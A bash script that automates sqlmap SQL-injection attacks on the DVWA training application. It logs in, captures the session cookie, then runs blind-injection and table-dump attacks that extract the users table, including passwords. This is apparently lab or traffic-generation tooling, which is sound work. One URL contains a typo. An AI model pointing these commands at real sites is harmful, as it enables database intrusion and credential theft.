#!/bin/bash

echo "------GET COOKIE FOR $DVWA_URL------"
CSRF=$(curl -s -c dvwa.cookie "$DVWA_URL/login.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2)
SESSIONID=$(grep PHPSESSID dvwa.cookie | awk -F ' ' '{print $7}')

curl -s -b dvwa.cookie -c dvwa.cookie -d "username=$USERNAME&password=$PASSWORD&user_token=${CSRF}&Login=Login" "$DVWA_URL/login.php" 
SESSIONID=$(grep PHPSESSID dvwa.cookie | awk -F ' ' '{print $7}')

echo "cookie: $SESSIONID"

if [[ $ATTACK_TYPE == 'blind_injection' ]]; then 
	echo "------ATTACK BLIND INJECTION - $URL------"
	for i in $(seq 1 $USERS); do
		echo "Attack for user $i"
		URL="$DVWA_URL/vulnerabilities/sqli_blind/?id=$i&Submit=Submit" 
		sqlmap --batch -u "'$URL'"  --cookie="\"PHPSESSID=${SESSIONID}; security=${MODE}\"" --level="$LEVEL" --risk="$RISK" -p id --suffix="'-BR'" -v3 --technique="$TECHNIQUE"
	done
elif [[ $ATTACK_TYPE == 'dump' ]]; then 
	echo "------ATTACK DUMP - $URL------"
	for i in $(seq 1 $USERS); do 
		echo "Attack for user $i"
		URL="$DVWA_URL/vulnerabilities/sqli/?id=$i&Submit=Submit"
		sqlmap --batch -u "$URL" --cookie="\"PHPSESSID=${SESSIONID}; security=${MODE}\"" --level="$LEVEL" --risk="$RISK" --dbs --tables -D dvwa -T users --columns -C "user, avatar, failed_login, first_name, last_login, last_name, password, user_id" --dump --technique="$TECHNIQUE" --random-agent	
	done
else
	echo "------ATTACK SQLMAP ALL - $URL------"
	for i in $(seq 1 $USERS); do
	    echo "Attack for user $i"
	    URL="$DVWA_URL/vvulnerabilities/sqli/?id=$i&Submit=Submit"  
		sqlmap --batch -u "$URL"   --cookie="\"PHPSESSID=${SESSIONID}; security=${MODE}\"" --level="$LEVEL" --risk="$RISK" --technique="$TECHNIQUE"
		sqlmap --batch -u "$URL" --cookie="\"PHPSESSID=${SESSIONID}; security=${MODE}\"" --level="$LEVEL" --risk="$RISK" --dbs --tables -D dvwa -T users --columns -C "user, avatar, failed_login, first_name, last_login, last_name, password, user_id" --dump --technique="$TECHNIQUE" --random-agent	
	    sqlmap --batch -u "$URL"   --cookie="\"PHPSESSID=${SESSIONID}; security=${MODE}\"" --level="$LEVEL" --risk="$RISK"
	    URL="$DVWA_URL/vulnerabilities/sqli_blind/?id=$i&Submit=Submit" 
	    sqlmap --batch -u "$URL"  --cookie="\"PHPSESSID=${SESSIONID}; security=${MODE}\"" --level="$LEVEL" --risk="$RISK" -p id --suffix="'-BR'" -v3 --technique="$TECHNIQUE"	
	done

fi